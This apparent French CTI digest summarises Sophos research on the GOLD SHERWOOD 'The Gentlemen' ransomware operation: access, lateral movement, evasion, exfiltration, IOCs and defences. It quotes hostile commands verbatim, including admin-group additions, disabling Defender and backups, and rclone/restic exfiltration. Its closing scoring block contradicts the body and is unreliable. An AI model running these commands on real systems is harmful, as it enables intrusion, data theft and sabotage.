🔍 Contexte

PubliĂ© le 1er septembre 2026 par Sophos sur leur blog officiel, cet article prĂ©sente les conclusions des chercheurs de la Counter Threat Unitℱ (CTU) concernant le groupe de menace GOLD SHERWOOD et son opĂ©ration ransomware-as-a-service (RaaS) The Gentlemen. L’analyse repose sur 15 intrusions distinctes investiguĂ©es par la CTU.

🎯 Acteur et modĂšle opĂ©ratoire

GOLD SHERWOOD exploite le schĂ©ma RaaS The Gentlemen depuis mi-2025, sur un modĂšle de double extorsion : vol de donnĂ©es avant chiffrement. Les premiĂšres victimes ont Ă©tĂ© publiĂ©es sur un site de fuite dĂ©diĂ© en septembre 2025, mois durant lequel une annonce de recrutement d’affiliĂ©s proposant un partage de rançon 90/10 est apparue sur le forum underground RAMP.

Volumétrie du site de fuite :

  • Moins de 20 victimes par mois sur la fin 2025
  • Moyenne supĂ©rieure Ă  75 par mois dĂšs le dĂ©but 2026, suggĂ©rant une hausse du nombre d’affiliĂ©s actifs
  • 683 victimes cumulĂ©es fin juillet 2026, dont 169 pour le seul mois de juillet

La victimologie est typique d’une entreprise cybercriminelle opportuniste : tous secteurs confondus, les affiliĂ©s compromettent les organisations sur la seule base des accĂšs disponibles.

🧭 ChaĂźne d’attaque observĂ©e

1. AccĂšs initial

Les affiliĂ©s s’appuient sur l’exploitation de vulnĂ©rabilitĂ©s de pare-feux et l’abus d’identifiants VPN :

  • Group-IB a dĂ©crit en mars la reconnaissance d’interfaces de management FortiGate exposĂ©es et vulnĂ©rables Ă  CVE-2024-55591
  • Des logs Rocket.Chat fuitĂ©s en mai montraient le groupe testant des identifiants volĂ©s contre une sĂ©rie de services VPN
  • La CTU a relevĂ© des artefacts suggĂ©rant l’exploitation d’Ă©quipements Fortinet, sans confirmation possible via la tĂ©lĂ©mĂ©trie
  • Incident de fĂ©vrier : authentification sur un VPN SSL Fortinet avec des identifiants compromis, depuis une IP externe gĂ©olocalisĂ©e aux Pays-Bas. L’absence de MFA a permis l’accĂšs. Dans l’heure suivante, plusieurs sessions VPN ont Ă©tĂ© ouvertes depuis diffĂ©rentes IP Ă©trangĂšres — redondance opĂ©rationnelle et validation d’accĂšs prĂ©coces.

2. Mouvement latéral

Progression via RDP avec des comptes de domaine valides, en authentifications rapprochĂ©es vers plusieurs systĂšmes internes dont un serveur de fichiers et des contrĂŽleurs de domaine. L’accĂšs est maintenu par des reconnexions VPN rĂ©pĂ©tĂ©es.

3. Staging des outils

Les outils sont dĂ©posĂ©s dans C:\PerfLogs, rĂ©pertoire systĂšme lĂ©gitime rarement surveillĂ© : outils d’exfiltration et de sauvegarde, EDR killers et leurs drivers vulnĂ©rables, outils de dĂ©couverte. Autre rĂ©pertoire observĂ© : C:\Users\<username>\Documents\AVAST2\.

4. Découverte, accÚs aux identifiants et escalade de privilÚges

  • ÉnumĂ©ration rĂ©seau via Advanced IP Scanner et SoftPerfect Network Scanner (exĂ©cutĂ© de façon rĂ©pĂ©tĂ©e sur de nombreux serveurs, en prĂ©paration du mouvement latĂ©ral et de l’exfiltration)
  • RĂ©cupĂ©ration du PID de LSASS : tasklist /v /fo csv | findstr /i "lsass"
  • Usage de Mimikatz confirmĂ© par des recherches tierces (absent de la tĂ©lĂ©mĂ©trie Sophos)
  • Manipulation directe des groupes locaux et de domaine :
    • net1 localgroup administrators itadmin /add
    • net group "domain admins" ldap /add /domain
    • net user administrator qwertyu1 /domain
  • Dans un incident, changement du mot de passe de deux comptes administrateurs pour verrouiller l’accĂšs et entraver la remĂ©diation

5. Persistance

  • Installation d’un agent Cloudflared en tant que service Windows, exĂ©cutant cloudflared.exe via un token valide — canal d’accĂšs distant discret et indĂ©pendant du VPN initial
  • DĂ©ploiement de Datto RMM sur un poste (rĂŽle exact non dĂ©terminĂ©)
  • Dans au moins quatre incidents, activation de RDP au niveau systĂšme puis ouverture du port :
    • reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /d 0 /f
    • netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=tcp localport=3389

6. Exfiltration

Rclone est l’outil privilĂ©giĂ© (observĂ© dans 5 des 15 incidents), devant MEGAsync et FileZilla. Les paramĂštres sont ajustĂ©s pour limiter le volume et le bruit, avec des destinations distantes nommĂ©es d’aprĂšs la victime :

  • rclone copy s:\ wasabi1:<remote location> --transfers 8 --max-age 4y --include-from filter.txt -p
  • rclone copy E:\ <remote location> --transfers 8 --max-age 5y --include-from filter.txt -P
  • rclone copy z:\ :<remote location> --include-from filter.txt -p
  • rclone copy ... remote:<remote location>/ -q --ignore-existing
  • rclone copy --filter-from filter-file.txt "\\10.0.0.221\D$" remote:<remote location>/ -q --ignore-existing --auto-confirm --multi-thread-streams 8 --transfers 8 --max-age 8y --progress

Dans une intrusion, la stratĂ©gie s’est rĂ©vĂ©lĂ©e sĂ©quentielle et adaptative plutĂŽt que figĂ©e : aprĂšs une premiĂšre exfiltration Rclone depuis un lecteur mappĂ© (z:), bascule ~25 minutes plus tard vers Restic (restic init, puis inspection de notepad.exe c:\perflogs\restic-config.bat, puis restic backup z:\ --include-file=filter.txt et restic backup z:\ --exclude="*.exe"), puis usage du client MinIO (mc cp --recursive z:\ wasabi/...) vers du stockage objet.

7. Évasion des dĂ©fenses

EDR killers (BYOVD) — ESET a documentĂ© en juin 2026 la fourniture aux affiliĂ©s d’une suite d’outils exploitant des drivers vulnĂ©rables. Variantes observĂ©es par la CTU :

Variante Fichiers Incidents
GentleKiller – Watchdog bitd1.exe, bitd2.exe, bitdclear.exe, bitdlight.exe, y7d0.exe 6
GentleKiller – Javelin eaanticheat1.exe, eaanticheat2.exe, eaanticheatclear.exe, eaanticheatlight.exe, EASOLO1.exe, EASolo1Light.exe, EASOLO2.exe, EASOLO2clear.exe 6
GentleKiller – G11 g111.exe 1
GentleKiller – FACEIT Anti-Cheat FaceITClear.exe 1
Havoc acronis.exe, hwaudkiller.exe, sophos.exe, Sophos2.exe, Sophos3.exe 2
Xkpsm-Killer x.exe 2

L’outil open source Xkpsm-Killer n’avait jamais Ă©tĂ© observĂ© dans des compromissions The Gentlemen : tĂ©lĂ©chargement du driver vulnĂ©rable xkpsm.sys puis exĂ©cution de x.exe pour cibler les processus Sophos EDR (tentatives dĂ©tectĂ©es).

Neutralisation de Windows Defender :

  • powershell -command "Add-MpPreference -ExclusionPath C:\ -Force" (exclusion du disque C: entier)
  • powershell -command "add-mppreference -exclusionprocess" c:\x\g_<file extension>_windows_amd64.exe -force
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1
  • ExĂ©cution d’un script batch hĂ©bergĂ© sur le partage NETLOGON d’un contrĂŽleur de domaine pour une diffusion homogĂšne : cmd.exe /c "\\NETLOGON\avkill.bat"

Sabotage des sauvegardes et destruction de traces :

  • Plus de 200 variations de commandes sc config visant un large Ă©ventail de services de sauvegarde et de rĂ©plication, systĂ©matiquement juste avant le dĂ©ploiement du ransomware :
    • sc config VeeamBackupSvc start= disabled
    • sc config SQLWriter start= disabled
    • sc config BackupExecAgent start= disabled
  • Effacement des journaux Application, SystĂšme et SĂ©curitĂ© sur plusieurs hĂŽtes

8. Exécution et impact

GOLD SHERWOOD fournit un ransomware propriétaire décliné en versions Windows, Linux et ESXi ; seule la variante Windows a été déployée dans les incidents analysés (la variante ESXi a été téléchargée une fois, sans déploiement constaté).

Binaires écrits en Go, aux formats de nom :

  • locker_<file extension string>_windows_amd64.exe
  • G_<file extension string>_windows_amd64.exe
  • decryptor.exe

ParamÚtres en ligne de commande : --password (clé de chiffrement), --superfast / --ultrafast (vitesse), --keep (conservation des extensions), --path (ciblage distant via chemins UNC, ex. \\<IP>\c$\users).

DĂ©ploiement par exĂ©cution locale depuis les rĂ©pertoires de staging, mouvement latĂ©ral via PsExec, et distribution Ă  l’Ă©chelle du domaine via les partages NETLOGON. Les fichiers chiffrĂ©s reçoivent une extension de six caractĂšres, souvent reprise dans le nom du binaire, et une note README-GENTLEMEN.txt est dĂ©posĂ©e dans tous les rĂ©pertoires affectĂ©s. La note contient un Tox ID, un Session ID et un lien .onion vers le blog de fuite, avec un compte Ă  rebours de 239 heures.

⚡ Temps de latence

Le dĂ©lai mĂ©dian entre la premiĂšre activitĂ© post-compromission observĂ©e et le dĂ©ploiement du ransomware est d’environ deux jours, le plus court Ă©tant infĂ©rieur Ă  24 heures.

đŸ›Ąïž Recommandations

  • Imposer le MFA sur les VPN et tous les services d’accĂšs distant
  • Patcher rapidement les pare-feux et concentrateurs VPN exposĂ©s
  • Restreindre et surveiller les modifications de groupes d’administration
  • Limiter l’exposition RDP et alerter sur les modifications suspectes de registre, de rĂšgles pare-feu et d’exclusions Defender
  • Surveiller les exĂ©cutions inhabituelles depuis C:\PerfLogs et rĂ©pertoires de staging assimilĂ©s
  • DĂ©tecter l’usage de Rclone, Restic, FileZilla, MEGAsync et MinIO Client
  • ProtĂ©ger les plateformes de sauvegarde contre les changements de configuration de service non autorisĂ©s
  • Investiguer toute tentative de dĂ©sactivation d’outils de sĂ©curitĂ©, d’effacement de journaux ou de chargement de drivers vulnĂ©rables

📄 Nature de l’article

Il s’agit d’une publication de recherche CTI dont le but principal est de documenter et partager les tactiques, techniques et procĂ©dures (TTPs) observĂ©es dans le cadre de l’opĂ©ration RaaS The Gentlemen afin d’alimenter la connaissance des dĂ©fenseurs.

🧠 TTPs et IOCs dĂ©tectĂ©s

Acteurs de menace

  • GOLD SHERWOOD (cybercriminal) — orkl.eu

TTP

  • T1190 — Exploit Public-Facing Application (Initial Access)
  • T1133 — External Remote Services (Initial Access)
  • T1078 — Valid Accounts (Defense Evasion)
  • T1068 — Exploitation for Privilege Escalation (Privilege Escalation)
  • T1021.001 — Remote Services: Remote Desktop Protocol (Lateral Movement)
  • T1021.002 — Remote Services: SMB/Windows Admin Shares (Lateral Movement)
  • T1569.002 — System Services: Service Execution (Execution)
  • T1046 — Network Service Discovery (Discovery)
  • T1057 — Process Discovery (Discovery)
  • T1003.001 — OS Credential Dumping: LSASS Memory (Credential Access)
  • T1098 — Account Manipulation (Persistence)
  • T1136.001 — Create Account: Local Account (Persistence)
  • T1531 — Account Access Removal (Impact)
  • T1543.003 — Create or Modify System Process: Windows Service (Persistence)
  • T1219 — Remote Access Software (Command and Control)
  • T1112 — Modify Registry (Defense Evasion)
  • T1562.001 — Impair Defenses: Disable or Modify Tools (Defense Evasion)
  • T1562.004 — Impair Defenses: Disable or Modify System Firewall (Defense Evasion)
  • T1070.001 — Indicator Removal: Clear Windows Event Logs (Defense Evasion)
  • T1036 — Masquerading (Defense Evasion)
  • T1074 — Data Staged (Collection)
  • T1567.002 — Exfiltration to Cloud Storage (Exfiltration)
  • T1048 — Exfiltration Over Alternative Protocol (Exfiltration)
  • T1489 — Service Stop (Impact)
  • T1490 — Inhibit System Recovery (Impact)
  • T1486 — Data Encrypted for Impact (Impact)

Malware / Outils

  • The Gentlemen (ransomware, Go, variantes Windows/Linux/ESXi)
  • GentleKiller (EDR killer, variantes Watchdog / Javelin / G11 / FACEIT Anti-Cheat)
  • Havoc (EDR killer)
  • Xkpsm-Killer (EDR killer open source)
  • Mimikatz (credential dumping)
  • Rclone, Restic, MinIO Client (mc), MEGAsync, FileZilla (exfiltration)
  • Advanced IP Scanner, SoftPerfect Network Scanner (dĂ©couverte)
  • Cloudflared, Datto RMM, PsExec (accĂšs distant / exĂ©cution)

CVE

  • CVE-2024-55591 — Fortinet FortiOS / FortiProxy (contournement d’authentification, interfaces de management exposĂ©es)

Indicateurs de compromission

EDR killers — acronis.exe

  • MD5 622b2ca08552535bc142cb815ff9ec16
  • SHA1 f0bc50d2d2838c5294e21cd9bce2f09bf581e508
  • SHA256 a348f5fa048a09188bd706fd3d4efca978990caf3355ecfee501c9f1e19c0efd
  • MD5 4741a4976c6abfb3c80c170104518b6e
  • SHA1 be8c52474ab79a52af31e3cb2f71638299a0de1d
  • SHA256 ddba5b4e7a7ada77d56477e9d41c008f93e81d9a33ed09e77cb2af624fa694fe

EDR killers — acronis.exe / hwaudkiller.exe

  • MD5 738df7ae0097f6bef93d65be5d4a2a26
  • SHA1 c96baab9b7e7ef661921d44d7900f165c794ed25
  • SHA256 1a9291ec869155336bf185d221d655d11c77a55ea0c8ecc0274202f74a90fcd1

EDR killer — y7D0.exe

  • MD5 d8691ef15eea27cfefafeeb485286080
  • SHA1 8bca55b3c9bfbdf68c9b6c72a7b1bf1dd6d5e3b2
  • SHA256 3c71537b64487bbf4d1793f72c75d332650d09a77b71e4d884ff15c266a847f6

EDR killer — sophos.exe

  • MD5 b23b653541bd95bdc4da07a0b07b57bf
  • SHA1 f0537cbb773ae12100b36731e7c39f5a9d852b14
  • SHA256 50f2cdf16f05da9253fa2d6eb60d5a42da14c02c551c0874c9e953d4119da69c

EDR killer — sophos2.exe

  • SHA256 bf7a2fb7f7256809dc690213b85f747cef8db7b909caf9783cac181912fb6207

EDR killer — sophos3.exe

  • SHA256 761ce72420edf5e5531cdbad0e93397d7520cdead825886ca7f75cef76031720

EDR killer — g111.exe

  • MD5 002417da707b93bf5ce3cb26d28005f6
  • SHA1 8732c1ff565828a0bdef514b5dc0dfea40c1d1f2
  • SHA256 81053c2c3be8b7dbf7d5087dba05c940b3ee4fd95524272651c816b72c5a9443

EDR killer — FaceITClear.exe

  • SHA256 7a37acb031cddaa39ad20db0961baa5423ec53f318c49c9275c982507da76d6a

EDR killer — eaanticheat2.exe

  • MD5 bc4a8d7bbbeb941265dfc954539326c0
  • SHA1 b7cea81e6de895d01d01d20bd6dcfd347940b57f
  • SHA256 3a31ec3bf9b7eac6593a723145381f5d0f4ede076c4c8818d949a08f5596ff76

EDR killer — EAAntiCheatClear.exe

  • SHA256 68031d549de399a44bb00614b910106baccef5996623b2f1102352a52a5bb444

EDR killers — famille EASOLO

  • SHA1 058c3ff21e79770e4a60937c27b1ede227709248 (EASOLO1.exe)
  • SHA1 9c0b05eb75f971cc25ee979e49b227b86b19e833 (EASolo1Light.exe)
  • SHA1 a438ba2122a814320f47a056f04122f81c2ae6c5 (EASOLO2.exe)
  • SHA1 a8ba89e67297642dcc1ae77433ab84e1f27d1792 (EASOLO2clear.exe)

Drivers vulnĂ©rables (BYOVD) — nogbc.sys

  • MD5 8ea97d01cbf459b94d134d05c54cd33e
  • SHA1 5c9bf6b7e4c7dc9b9227ce86e2d271d624c35147
  • SHA256 0be8f415a485b11747bcfd71c9cd9781e090354728f076791ed6845b69ed78fb

Driver vulnĂ©rable (BYOVD) — G11.sys

  • MD5 07e9f0b8627a95960e79e930fb099e84
  • SHA1 56bee9df5833a637f5c54d5911df98b0812fe643
  • SHA256 2d91a78e739891c9854c254f5b2a6b84c0e167dfa253466cbccd2cdd1c20145d

Driver vulnĂ©rable (BYOVD) — dmx.sys

  • SHA256 ccdde8091d63eaafbe30d9f0482afd245abc10ab16e21ae9254e51e42cb80ae8

Autres artefacts

  • Driver xkpsm.sys associĂ© Ă  x.exe (Xkpsm-Killer)
  • Note de rançon : README-GENTLEMEN.txt
  • RĂ©pertoires de staging : C:\PerfLogs\, C:\Users\<username>\Documents\AVAST2\
  • Script de dĂ©sactivation AV : \\NETLOGON\avkill.bat
  • Fichier de configuration : c:\perflogs\restic-config.bat

Contre-mesures Sophos

ATK/KillAV-ENI, ATK/KillAV-HID, ATK/KillAV-HWA, ATK/KillAV-NC, ATK/KillAV-SKY, ATK/KillAV-SKZ, ATK/KillAV-SOP, Creds_4i, CXrep/MalGo-B, Evade_40g, Evade_66a, Prevent_2a, Troj/ABYSSW-B, Troj/HCrypt-E, W32/Neshta-D


🟡 Indice de vĂ©rification factuelle : 45/100 (moyenne)

  • ✅ sophos.com — source reconnue (liste interne) (20pts)
  • ✅ 773 chars — extrait court (5pts)
  • ⬜ aucun IOC extrait (0pts)
  • ⬜ pas d’IOC Ă  vĂ©rifier (0pts)
  • ✅ 5 TTPs MITRE identifiĂ©es (15pts)
  • ⬜ date RSS ou approximĂ©e (0pts)
  • ✅ acteur(s) identifiĂ©(s) : GOLD SHERWOOD (5pts)
  • ⬜ pas de CVE Ă  vĂ©rifier (0pts)

🔗 Source originale : https://www.sophos.com/en-us/blog/ungentlemanly-behavior-insights-into-a-ransomware-operation

🖮 Archive : https://web.archive.org/web/20260903070454/https://www.sophos.com/en-us/blog/ungentlemanly-behavior-insights-into-a-ransomware-operation